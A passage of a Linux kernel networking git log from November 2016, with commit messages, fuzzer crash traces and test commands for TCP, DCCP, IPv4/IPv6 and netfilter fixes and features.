 [<ffffffff81003a05>] exit_to_usermode_loop+0xe5/0x130
arch/x86/entry/common.c:156
 [<     inline     >] prepare_exit_to_usermode arch/x86/entry/common.c:190
 [<ffffffff81006298>] syscall_return_slowpath+0x1a8/0x1e0
arch/x86/entry/common.c:259
 [<ffffffff83fc1a62>] entry_SYSCALL_64_fastpath+0xc0/0xc2
Dumping ftrace buffer:
   (ftrace buffer empty)
Kernel Offset: disabled

Fix this the same way we did for TCP in commit 565b7b2d2e
("tcp: do not send reset to already closed sockets")

Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-03 16:16:51 -04:00
Eric Dumazet
c3f24cfb3e dccp: do not release listeners too soon
Andrey Konovalov reported following error while fuzzing with syzkaller :

IPv4: Attempt to release alive inet socket ffff880068e98940
kasan: CONFIG_KASAN_INLINE enabled
kasan: GPF could be caused by NULL-ptr deref or user memory access
general protection fault: 0000 [#1] SMP KASAN
Modules linked in:
CPU: 1 PID: 3905 Comm: a.out Not tainted 4.9.0-rc3+ #333
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
task: ffff88006b9e0000 task.stack: ffff880068770000
RIP: 0010:[<ffffffff819ead5f>]  [<ffffffff819ead5f>]
selinux_socket_sock_rcv_skb+0xff/0x6a0 security/selinux/hooks.c:4639
RSP: 0018:ffff8800687771c8  EFLAGS: 00010202
RAX: ffff88006b9e0000 RBX: 1ffff1000d0eee3f RCX: 1ffff1000d1d312a
RDX: 1ffff1000d1d31a6 RSI: dffffc0000000000 RDI: 0000000000000010
RBP: ffff880068777360 R08: 0000000000000000 R09: 0000000000000002
R10: dffffc0000000000 R11: 0000000000000006 R12: ffff880068e98940
R13: 0000000000000002 R14: ffff880068777338 R15: 0000000000000000
FS:  00007f00ff760700(0000) GS:ffff88006cd00000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000020008000 CR3: 000000006a308000 CR4: 00000000000006e0
Stack:
 ffff8800687771e0 ffffffff812508a5 ffff8800686f3168 0000000000000007
 ffff88006ac8cdfc ffff8800665ea500 0000000041b58ab3 ffffffff847b5480
 ffffffff819eac60 ffff88006b9e0860 ffff88006b9e0868 ffff88006b9e07f0
Call Trace:
 [<ffffffff819c8dd5>] security_sock_rcv_skb+0x75/0xb0 security/security.c:1317
 [<ffffffff82c2a9e7>] sk_filter_trim_cap+0x67/0x10e0 net/core/filter.c:81
 [<ffffffff82b81e60>] __sk_receive_skb+0x30/0xa00 net/core/sock.c:460
 [<ffffffff838bbf12>] dccp_v4_rcv+0xdb2/0x1910 net/dccp/ipv4.c:873
 [<ffffffff83069d22>] ip_local_deliver_finish+0x332/0xad0
net/ipv4/ip_input.c:216
 [<     inline     >] NF_HOOK_THRESH ./include/linux/netfilter.h:232
 [<     inline     >] NF_HOOK ./include/linux/netfilter.h:255
 [<ffffffff8306abd2>] ip_local_deliver+0x1c2/0x4b0 net/ipv4/ip_input.c:257
 [<     inline     >] dst_input ./include/net/dst.h:507
 [<ffffffff83068500>] ip_rcv_finish+0x750/0x1c40 net/ipv4/ip_input.c:396
 [<     inline     >] NF_HOOK_THRESH ./include/linux/netfilter.h:232
 [<     inline     >] NF_HOOK ./include/linux/netfilter.h:255
 [<ffffffff8306b82f>] ip_rcv+0x96f/0x12f0 net/ipv4/ip_input.c:487
 [<ffffffff82bd9fb7>] __netif_receive_skb_core+0x1897/0x2a50 net/core/dev.c:4213
 [<ffffffff82bdb19a>] __netif_receive_skb+0x2a/0x170 net/core/dev.c:4251
 [<ffffffff82bdb493>] netif_receive_skb_internal+0x1b3/0x390 net/core/dev.c:4279
 [<ffffffff82bdb6b8>] netif_receive_skb+0x48/0x250 net/core/dev.c:4303
 [<ffffffff8241fc75>] tun_get_user+0xbd5/0x28a0 drivers/net/tun.c:1308
 [<ffffffff82421b5a>] tun_chr_write_iter+0xda/0x190 drivers/net/tun.c:1332
 [<     inline     >] new_sync_write fs/read_write.c:499
 [<ffffffff8151bd44>] __vfs_write+0x334/0x570 fs/read_write.c:512
 [<ffffffff8151f85b>] vfs_write+0x17b/0x500 fs/read_write.c:560
 [<     inline     >] SYSC_write fs/read_write.c:607
 [<ffffffff81523184>] SyS_write+0xd4/0x1a0 fs/read_write.c:599
 [<ffffffff83fc02c1>] entry_SYSCALL_64_fastpath+0x1f/0xc2

It turns out DCCP calls __sk_receive_skb(), and this broke when
lookups no longer took a reference on listeners.

Fix this issue by adding a @refcounted parameter to __sk_receive_skb(),
so that sock_put() is used only when needed.

Fixes: 3b24d854cb ("tcp/dccp: do not touch listener sk_refcnt under synflood")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-03 16:16:50 -04:00
Eric Dumazet
79d8665b95 tcp: fix return value for partial writes
After my commit, tcp_sendmsg() might restart its loop after
processing socket backlog.

If sk_err is set, we blindly return an error, even though we
copied data to user space before.

We should instead return number of bytes that could be copied,
otherwise user space might resend data and corrupt the stream.

This might happen if another thread is using recvmsg(MSG_ERRQUEUE)
to process timestamps.

Issue was diagnosed by Soheil and Willem, big kudos to them !

Fixes: d41a69f1d3 ("tcp: make tcp_sendmsg() aware of socket backlog")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Willem de Bruijn <willemb@google.com>
Cc: Soheil Hassas Yeganeh <soheil@google.com>
Cc: Yuchung Cheng <ycheng@google.com>
Cc: Neal Cardwell <ncardwell@google.com>
Tested-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-03 16:12:06 -04:00
Lance Richardson
9ee6c5dc81 ipv4: allow local fragmentation in ip_finish_output_gso()
Some configurations (e.g. geneve interface with default
MTU of 1500 over an ethernet interface with 1500 MTU) result
in the transmission of packets that exceed the configured MTU.
While this should be considered to be a "bad" configuration,
it is still allowed and should not result in the sending
of packets that exceed the configured MTU.

Fix by dropping the assumption in ip_finish_output_gso() that
locally originated gso packets will never need fragmentation.
Basic testing using iperf (observing CPU usage and bandwidth)
have shown no measurable performance impact for traffic not
requiring fragmentation.

Fixes: c7ba65d7b6 ("net: ip: push gso skb forwarding handling down the stack")
Reported-by: Jan Tluka <jtluka@redhat.com>
Signed-off-by: Lance Richardson <lrichard@redhat.com>
Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-03 16:10:26 -04:00
Willem de Bruijn
dbd1759e6a ipv6: on reassembly, record frag_max_size
IP6CB and IPCB have a frag_max_size field. In IPv6 this field is
filled in when packets are reassembled by the connection tracking
code. Also fill in when reassembling in the input path, to expose
it through cmsg IPV6_RECVFRAGSIZE in all cases.

Signed-off-by: Willem de Bruijn <willemb@google.com>
Acked-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-03 15:41:11 -04:00
Willem de Bruijn
0cc0aa614b ipv6: add IPV6_RECVFRAGSIZE cmsg
When reading a datagram or raw packet that arrived fragmented, expose
the maximum fragment size if recorded to allow applications to
estimate receive path MTU.

At this point, the field is only recorded when ipv6 connection
tracking is enabled. A follow-up patch will record this field also
in the ipv6 input path.

Tested using the test for IP_RECVFRAGSIZE plus

  ip netns exec to ip addr add dev veth1 fc07::1/64
  ip netns exec from ip addr add dev veth0 fc07::2/64

  ip netns exec to ./recv_cmsg_recvfragsize -6 -u -p 6000 &
  ip netns exec from nc -q 1 -u fc07::1 6000 < payload

Both with and without enabling connection tracking

  ip6tables -A INPUT -m state --state NEW -p udp -j LOG

Signed-off-by: Willem de Bruijn <willemb@google.com>
Acked-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-03 15:41:11 -04:00
Willem de Bruijn
70ecc24841 ipv4: add IP_RECVFRAGSIZE cmsg
The IP stack records the largest fragment of a reassembled packet
in IPCB(skb)->frag_max_size. When reading a datagram or raw packet
that arrived fragmented, expose the value to allow applications to
estimate receive path MTU.

Tested:
  Sent data over a veth pair of which the source has a small mtu.
  Sent data using netcat, received using a dedicated process.

  Verified that the cmsg IP_RECVFRAGSIZE is returned only when
  data arrives fragmented, and in that cases matches the veth mtu.

    ip link add veth0 type veth peer name veth1

    ip netns add from
    ip netns add to

    ip link set dev veth1 netns to
    ip netns exec to ip addr add dev veth1 192.168.10.1/24
    ip netns exec to ip link set dev veth1 up

    ip link set dev veth0 netns from
    ip netns exec from ip addr add dev veth0 192.168.10.2/24
    ip netns exec from ip link set dev veth0 up
    ip netns exec from ip link set dev veth0 mtu 1300
    ip netns exec from ethtool -K veth0 ufo off

    dd if=/dev/zero bs=1 count=1400 2>/dev/null > payload

    ip netns exec to ./recv_cmsg_recvfragsize -4 -u -p 6000 &
    ip netns exec from nc -q 1 -u 192.168.10.1 6000 < payload

  using github.com/wdebruij/kerneltools/blob/master/tests/recvfragsize.c

Signed-off-by: Willem de Bruijn <willemb@google.com>
Acked-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-03 15:41:11 -04:00
Eric Dumazet
ac9e70b17e tcp: fix potential memory corruption
Imagine initial value of max_skb_frags is 17, and last
skb in write queue has 15 frags.

Then max_skb_frags is lowered to 14 or smaller value.

tcp_sendmsg() will then be allowed to add additional page frags
and eventually go past MAX_SKB_FRAGS, overflowing struct
skb_shared_info.

Fixes: 5f74f82ea3 ("net:Add sysctl_max_skb_frags")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Hans Westgaard Ry <hans.westgaard.ry@oracle.com>
Cc: Håkon Bugge <haakon.bugge@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-03 15:33:30 -04:00
Cyrill Gorcunov
9999370fae net: ip, raw_diag -- Use jump for exiting from nested loop
I managed to miss that sk_for_each is called under "for"
cycle so need to use goto here to return matching socket.

CC: David S. Miller <davem@davemloft.net>
CC: Eric Dumazet <eric.dumazet@gmail.com>
CC: David Ahern <dsa@cumulusnetworks.com>
CC: Andrey Vagin <avagin@openvz.org>
CC: Stephen Hemminger <stephen@networkplumber.org>
Signed-off-by: Cyrill Gorcunov <gorcunov@openvz.org>
Acked-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-03 15:25:26 -04:00
Cyrill Gorcunov
cd05a0eca8 net: ip, raw_diag -- Fix socket leaking for destroy request
In raw_diag_destroy the helper raw_sock_get returns
with sock_hold call, so we have to put it then.

CC: David S. Miller <davem@davemloft.net>
CC: Eric Dumazet <eric.dumazet@gmail.com>
CC: David Ahern <dsa@cumulusnetworks.com>
CC: Andrey Vagin <avagin@openvz.org>
CC: Stephen Hemminger <stephen@networkplumber.org>
Signed-off-by: Cyrill Gorcunov <gorcunov@openvz.org>
Acked-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-03 15:25:26 -04:00
WANG Cong
14135f30e3 inet: fix sleeping inside inet_wait_for_connect()
Andrey reported this kernel warning:

  WARNING: CPU: 0 PID: 4608 at kernel/sched/core.c:7724
  __might_sleep+0x14c/0x1a0 kernel/sched/core.c:7719
  do not call blocking ops when !TASK_RUNNING; state=1 set at
  [<ffffffff811f5a5c>] prepare_to_wait+0xbc/0x210
  kernel/sched/wait.c:178
  Modules linked in:
  CPU: 0 PID: 4608 Comm: syz-executor Not tainted 4.9.0-rc2+ #320
  Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
   ffff88006625f7a0 ffffffff81b46914 ffff88006625f818 0000000000000000
   ffffffff84052960 0000000000000000 ffff88006625f7e8 ffffffff81111237
   ffff88006aceac00 ffffffff00001e2c ffffed000cc4beff ffffffff84052960
  Call Trace:
   [<     inline     >] __dump_stack lib/dump_stack.c:15
   [<ffffffff81b46914>] dump_stack+0xb3/0x10f lib/dump_stack.c:51
   [<ffffffff81111237>] __warn+0x1a7/0x1f0 kernel/panic.c:550
   [<ffffffff8111132c>] warn_slowpath_fmt+0xac/0xd0 kernel/panic.c:565
   [<ffffffff811922fc>] __might_sleep+0x14c/0x1a0 kernel/sched/core.c:7719
   [<     inline     >] slab_pre_alloc_hook mm/slab.h:393
   [<     inline     >] slab_alloc_node mm/slub.c:2634
   [<     inline     >] slab_alloc mm/slub.c:2716
   [<ffffffff81508da0>] __kmalloc_track_caller+0x150/0x2a0 mm/slub.c:4240
   [<ffffffff8146be14>] kmemdup+0x24/0x50 mm/util.c:113
   [<ffffffff8388b2cf>] dccp_feat_clone_sp_val.part.5+0x4f/0xe0 net/dccp/feat.c:374
   [<     inline     >] dccp_feat_clone_sp_val net/dccp/feat.c:1141
   [<     inline     >] dccp_feat_change_recv net/dccp/feat.c:1141
   [<ffffffff8388d491>] dccp_feat_parse_options+0xaa1/0x13d0 net/dccp/feat.c:1411
   [<ffffffff83894f01>] dccp_parse_options+0x721/0x1010 net/dccp/options.c:128
   [<ffffffff83891280>] dccp_rcv_state_process+0x200/0x15b0 net/dccp/input.c:644
   [<ffffffff838b8a94>] dccp_v4_do_rcv+0xf4/0x1a0 net/dccp/ipv4.c:681
   [<     inline     >] sk_backlog_rcv ./include/net/sock.h:872
   [<ffffffff82b7ceb6>] __release_sock+0x126/0x3a0 net/core/sock.c:2044
   [<ffffffff82b7d189>] release_sock+0x59/0x1c0 net/core/sock.c:2502
   [<     inline     >] inet_wait_for_connect net/ipv4/af_inet.c:547
   [<ffffffff8316b2a2>] __inet_stream_connect+0x5d2/0xbb0 net/ipv4/af_inet.c:617
   [<ffffffff8316b8d5>] inet_stream_connect+0x55/0xa0 net/ipv4/af_inet.c:656
   [<ffffffff82b705e4>] SYSC_connect+0x244/0x2f0 net/socket.c:1533
   [<ffffffff82b72dd4>] SyS_connect+0x24/0x30 net/socket.c:1514
   [<ffffffff83fbf701>] entry_SYSCALL_64_fastpath+0x1f/0xc2
  arch/x86/entry/entry_64.S:209

Unlike commit 26cabd3125
("sched, net: Clean up sk_wait_event() vs. might_sleep()"), the
sleeping function is called before schedule_timeout(), this is indeed
a bug. Fix this by moving the wait logic to the new API, it is similar
to commit ff960a7317
("netdev, sched/wait: Fix sleeping inside wait event").

Reported-by: Andrey Konovalov <andreyknvl@google.com>
Cc: Andrey Konovalov <andreyknvl@google.com>
Cc: Eric Dumazet <eric.dumazet@gmail.com>
Cc: Peter Zijlstra <peterz@infradead.org>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-03 15:18:07 -04:00
Pablo Neira Ayuso
08733a0cb7 netfilter: handle NF_REPEAT from nf_conntrack_in()
NF_REPEAT is only needed from nf_conntrack_in() under a very specific
case required by the TCP protocol tracker, we can handle this case
without returning to the core hook path. Handling of NF_REPEAT from the
nf_reinject() is left untouched.

Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-03 11:53:00 +01:00
Pablo Neira Ayuso
26dfab7216 netfilter: merge nf_iterate() into nf_hook_slow()
nf_iterate() has become rather simple, we can integrate this code into
nf_hook_slow() to reduce the amount of LOC in the core path.

However, we still need nf_iterate() around for nf_queue packet handling,
so move this function there where we only need it. I think it should be
possible to refactor nf_queue code to get rid of it definitely, but
given this is slow path anyway, let's have a look this later.

Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-03 11:52:59 +01:00
Pablo Neira Ayuso
01886bd91f netfilter: remove hook_entries field from nf_hook_state
This field is only useful for nf_queue, so store it in the
nf_queue_entry structure instead, away from the core path. Pass
hook_head to nf_hook_slow().

Since we always have a valid entry on the first iteration in
nf_iterate(), we can use 'do { ... } while (entry)' loop instead.

Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-03 11:52:58 +01:00
Pablo Neira Ayuso
c63cbc4604 netfilter: use switch() to handle verdict cases from nf_hook_slow()
Use switch() for verdict handling and add explicit handling for
NF_STOLEN and other non-conventional verdicts.

Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-03 11:52:57 +01:00
Pablo Neira Ayuso
0e5a1c7eb3 netfilter: nf_tables: use hook state from xt_action_param structure
Don't copy relevant fields from hook state structure, instead use the
one that is already available in struct xt_action_param.

This patch also adds a set of new wrapper functions to fetch relevant
hook state structure fields.

Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-03 11:52:34 +01:00
Pablo Neira Ayuso
613dbd9572 netfilter: x_tables: move hook state into xt_action_param structure
Place pointer to hook state in xt_action_param structure instead of
copying the fields that we need. After this change xt_action_param fits
into one cacheline.

This patch also adds a set of new wrapper functions to fetch relevant
hook state structure fields.

Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-03 10:56:21 +01:00
Pablo Neira Ayuso
06fd3a392b netfilter: deprecate NF_STOP
NF_STOP is only used by br_netfilter these days, and it can be emulated
with a combination of NF_STOLEN plus explicit call to the ->okfn()
function as Florian suggests.

To retain binary compatibility with userspace nf_queue application, we
have to keep NF_STOP around, so libnetfilter_queue userspace userspace
applications still work if they use NF_STOP for some exotic reason.

Out of tree modules using NF_STOP would break, but we don't care about
those.

Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-03 10:56:17 +01:00
Pablo Neira Ayuso
1610a73c41 netfilter: kill NF_HOOK_THRESH() and state->tresh
Patch c5136b15ea ("netfilter: bridge: add and use br_nf_hook_thresh")
introduced br_nf_hook_thresh().

Replace NF_HOOK_THRESH() by br_nf_hook_thresh from
br_nf_forward_finish(), so we have no more callers for this macro.

As a result, state->thresh and explicit thresh parameter in the hook
state structure is not required anymore. And we can get rid of
skip-hook-under-thresh loop in nf_iterate() in the core path that is
only used by br_netfilter to search for the filter hook.

Suggested-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-03 10:56:12 +01:00
Pablo Neira Ayuso
d2be66f685 netfilter: remove comments that predate rcu days
We cannot block/sleep on nf_iterate because netfilter runs under rcu
read lock these days, where blocking is well-known to be illegal. So
let's remove these old comments.

Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-03 10:56:05 +01:00
Pablo Neira Ayuso
b250a7fc3b netfilter: get rid of useless debugging from core
This patch remove compile time code to catch inconventional verdicts.
We have better ways to handle this case these days, eg. pr_debug() but
even though I don't think this is useful at all, so let's remove this.

Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-03 10:55:54 +01:00
Tom Herbert
1913540a13 ila: Fix crash caused by rhashtable changes
commit ca26893f05 ("rhashtable: Add rhlist interface")
added a field to rhashtable_iter so that length became 56 bytes
and would exceed the size of args in netlink_callback (which is
48 bytes). The netlink diag dump function already has been
allocating a iter structure and storing the pointed to that
in the args of netlink_callback. ila_xlat also uses
rhahstable_iter but is still putting that directly in
the arg block. Now since rhashtable_iter size is increased
we are overwriting beyond the structure. The next field
happens to be cb_mutex pointer in netlink_sock and hence the crash.

Fix is to alloc the rhashtable_iter and save it as pointer
in arg.

Tested:

  modprobe ila
  ./ip ila add loc 3333:0:0:0 loc_match 2222:0:0:1,
  ./ip ila list  # NO crash now

Signed-off-by: Tom Herbert <tom@herbertland.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-02 15:26:02 -04:00
Cyrill Gorcunov
3de864f8c9 net: ip, diag -- Adjust raw_abort to use unlocked __udp_disconnect
While being preparing patches for killing raw sockets via
diag netlink interface I noticed that my runs are stuck:

 | [root@pcs7 ~]# cat /proc/`pidof ss`/stack
 | [<ffffffff816d1a76>] __lock_sock+0x80/0xc4
 | [<ffffffff816d206a>] lock_sock_nested+0x47/0x95
 | [<ffffffff8179ded6>] udp_disconnect+0x19/0x33
 | [<ffffffff8179b517>] raw_abort+0x33/0x42
 | [<ffffffff81702322>] sock_diag_destroy+0x4d/0x52

which has not been the case before. I narrowed it down to the commit

 | commit 286c72deab
 | Author: Eric Dumazet <edumazet@google.com>
 | Date:   Thu Oct 20 09:39:40 2016 -0700
 |
 |     udp: must lock the socket in udp_disconnect()

where we start locking the socket for different reason.

So the raw_abort escaped the renaming and we have to
fix this typo using __udp_disconnect instead.

Fixes: 286c72deab ("udp: must lock the socket in udp_disconnect()")
CC: David S. Miller <davem@davemloft.net>
CC: Eric Dumazet <eric.dumazet@gmail.com>
CC: David Ahern <dsa@cumulusnetworks.com>
CC: Alexey Kuznetsov <kuznet@ms2.inr.ac.ru>
CC: James Morris <jmorris@namei.org>
CC: Hideaki YOSHIFUJI <yoshfuji@linux-ipv6.org>
CC: Patrick McHardy <kaber@trash.net>
CC: Andrey Vagin <avagin@openvz.org>
CC: Stephen Hemminger <stephen@networkplumber.org>
Signed-off-by: Cyrill Gorcunov <gorcunov@openvz.org>
Acked-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-02 15:25:16 -04:00
Eric Dumazet
2331ccc5b3 tcp: enhance tcp collapsing
As Ilya Lesokhin suggested, we can collapse two skbs at retransmit
time even if the skb at the right has fragments.

We simply have to use more generic skb_copy_bits() instead of
skb_copy_from_linear_data() in tcp_collapse_retrans()

Also need to guard this skb_copy_bits() in case there is nothing to
copy, otherwise skb_put() could panic if left skb has frags.

Tested:

Used following packetdrill test

// Establish a connection.
0.000 socket(..., SOCK_STREAM, IPPROTO_TCP) = 3
   +0 setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
   +0 bind(3, ..., ...) = 0
   +0 listen(3, 1) = 0

   +0 < S 0:0(0) win 32792 <mss 1460,sackOK,nop,nop,nop,wscale 8>
   +0 > S. 0:0(0) ack 1 <mss 1460,nop,nop,sackOK,nop,wscale 8>
+.100 < . 1:1(0) ack 1 win 257
   +0 accept(3, ..., ...) = 4

   +0 setsockopt(4, SOL_TCP, TCP_NODELAY, [1], 4) = 0
   +0 write(4, ..., 200) = 200
   +0 > P. 1:201(200) ack 1
+.001 write(4, ..., 200) = 200
   +0 > P. 201:401(200) ack 1
+.001 write(4, ..., 200) = 200
   +0 > P. 401:601(200) ack 1
+.001 write(4, ..., 200) = 200
   +0 > P. 601:801(200) ack 1
+.001 write(4, ..., 200) = 200
   +0 > P. 801:1001(200) ack 1
+.001 write(4, ..., 100) = 100
   +0 > P. 1001:1101(100) ack 1
+.001 write(4, ..., 100) = 100
   +0 > P. 1101:1201(100) ack 1
+.001 write(4, ..., 100) = 100
   +0 > P. 1201:1301(100) ack 1
+.001 write(4, ..., 100) = 100
   +0 > P. 1301:1401(100) ack 1

+.100 < . 1:1(0) ack 1 win 257 <nop,nop,sack 1001:1401>
// Check that TCP collapse works :
   +0 > P. 1:1001(1000) ack 1

Reported-by: Ilya Lesokhin <ilyal@mellanox.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Neal Cardwell <ncardwell@google.com>
Cc: Yuchung Cheng <ycheng@google.com>
Cc: Ilpo Järvinen <ilpo.jarvinen@helsinki.fi>
Acked-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-02 15:21:36 -04:00
Eli Cooper
4fd19c15de ip6_udp_tunnel: remove unused IPCB related codes
Some IPCB fields are currently set in udp_tunnel6_xmit_skb(), which are
never used before it reaches ip6tunnel_xmit(), and past that point the
control buffer is no longer interpreted as IPCB.

This clears these unused IPCB related codes. Currently there is no skb
scrubbing in ip6_udp_tunnel, otherwise IPCB(skb)->opt might need to be
cleared for IPv4 packets, as shown in 5146d1f151
("tunnel: Clear IPCB(skb)->opt before dst_link_failure called").

Signed-off-by: Eli Cooper <elicooper@gmx.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-02 15:18:36 -04:00
Xin Long
e4ff952a7e sctp: clean up sctp_packet_transmit
After adding sctp gso, sctp_packet_transmit is a quite big function now.

This patch is to extract the codes for packing packet to sctp_packet_pack
from sctp_packet_transmit, and add some comments, simplify the err path by
freeing auth chunk when freeing packet chunk_list in out path and freeing
head skb early if it fails to pack packet.

Signed-off-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-02 15:03:13 -04:00
Roi Dayan
13fa876ebd net/sched: cls_flower: merge filter delete/destroy common code
Move common code from fl_delete and fl_detroy to __fl_delete.

Signed-off-by: Roi Dayan <roid@mellanox.com>
Acked-by: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-02 15:00:47 -04:00
Roi Dayan
a1a8f7fe92 net/sched: cls_flower: add missing unbind call when destroying flows
tcf_unbind was called in fl_delete but was missing in fl_destroy when
force deleting flows.

Fixes: 77b9900ef5 ('tc: introduce Flower classifier')
Signed-off-by: Roi Dayan <roid@mellanox.com>
Reviewed-by: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-02 15:00:47 -04:00
David S. Miller
4cb551a100 Merge git://git.kernel.org/pub/scm/linux/kernel/git/pablo/nf-next
Pablo Neira Ayuso says:

====================
Netfilter updates for net-next

The following patchset contains Netfilter updates for your net-next
tree. This includes better integration with the routing subsystem for
nf_tables, explicit notrack support and smaller updates. More
specifically, they are:

1) Add fib lookup expression for nf_tables, from Florian Westphal. This
   new expression provides a native replacement for iptables addrtype
   and rp_filter matches. This is more flexible though, since we can
   populate the kernel flowi representation to inquire fib to
   accomodate new usecases, such as RTBH through skb mark.

2) Introduce rt expression for nf_tables, from Anders K. Pedersen. This
   new expression allow you to access skbuff route metadata, more
   specifically nexthop and classid fields.

3) Add notrack support for nf_tables, to skip conntracking, requested by
   many users already.

4) Add boilerplate code to allow to use nf_log infrastructure from
   nf_tables ingress.

5) Allow to mangle pkttype from nf_tables prerouting chain, to emulate
   the xtables cluster match, from Liping Zhang.

6) Move socket lookup code into generic nf_socket_* infrastructure so
   we can provide a native replacement for the xtables socket match.

7) Make sure nfnetlink_queue data that is updated on every packets is
   placed in a different cache from read-only data, from Florian Westphal.

8) Handle NF_STOLEN from nf_tables core, also from Florian Westphal.

9) Start round robin number generation in nft_numgen from zero,
   instead of n-1, for consistency with xtables statistics match,
   patch from Liping Zhang.

10) Set GFP_NOWARN flag in skbuff netlink allocations in nfnetlink_log,
    given we retry with a smaller allocation on failure, from Calvin Owens.

11) Cleanup xt_multiport to use switch(), from Gao feng.

12) Remove superfluous check in nft_immediate and nft_cmp, from
    Liping Zhang.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-02 14:57:47 -04:00
Florian Westphal
886bc50348 netfilter: nf_queue: place volatile data in own cacheline
As the comment indicates, the data at the end of nfqnl_instance struct is
written on every queue/dequeue, so it should reside in its own cacheline.

Before this change, 'lock' was in first cacheline so we dirtied both.

Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-01 20:50:33 +01:00
Liping Zhang
e41e9d623c netfilter: nf_tables: remove useless U8_MAX validation
After call nft_data_init, size is already validated and desc.len will
not exceed the sizeof(struct nft_data), i.e. 16 bytes. So it will never
exceed U8_MAX.

Furthermore, in nft_immediate_init, we forget to call nft_data_uninit
when desc.len exceeds U8_MAX, although this will not happen, but it's
a logical mistake.

Now remove these redundant validation introduced by commit 36b701fae1
("netfilter: nf_tables: validate maximum value of u32 netlink attributes")

Signed-off-by: Liping Zhang <zlpnobody@gmail.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-01 20:50:32 +01:00
Anders K. Pedersen
2fa841938c netfilter: nf_tables: introduce routing expression
Introduces an nftables rt expression for routing related data with support
for nexthop (i.e. the directly connected IP address that an outgoing packet
is sent to), which can be used either for matching or accounting, eg.

 # nft add rule filter postrouting \
	ip daddr 192.168.1.0/24 rt nexthop != 192.168.0.1 drop

This will drop any traffic to 192.168.1.0/24 that is not routed via
192.168.0.1.

 # nft add rule filter postrouting \
	flow table acct { rt nexthop timeout 600s counter }
 # nft add rule ip6 filter postrouting \
	flow table acct { rt nexthop timeout 600s counter }

These rules count outgoing traffic per nexthop. Note that the timeout
releases an entry if no traffic is seen for this nexthop within 10 minutes.

 # nft add rule inet filter postrouting \
	ether type ip \
	flow table acct { rt nexthop timeout 600s counter }
 # nft add rule inet filter postrouting \
	ether type ip6 \
	flow table acct { rt nexthop timeout 600s counter }

Same as above, but via the inet family, where the ether type must be
specified explicitly.

"rt classid" is also implemented identical to "meta rtclassid", since it
is more logical to have this match in the routing expression going forward.

Signed-off-by: Anders K. Pedersen <akp@cohaesio.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-01 20:50:31 +01:00
Pablo Neira Ayuso
8db4c5be88 netfilter: move socket lookup infrastructure to nf_socket_ipv{4,6}.c
We need this split to reuse existing codebase for the upcoming nf_tables
socket expression.

Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-01 20:50:31 +01:00
Pablo Neira Ayuso
1fddf4bad0 netfilter: nf_log: add packet logging for netdev family
Move layer 2 packet logging into nf_log_l2packet() that resides in
nf_log_common.c, so this can be shared by both bridge and netdev
families.

This patch adds the boiler plate code to register the netdev logging
family.

Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-01 20:50:30 +01:00
Florian Westphal
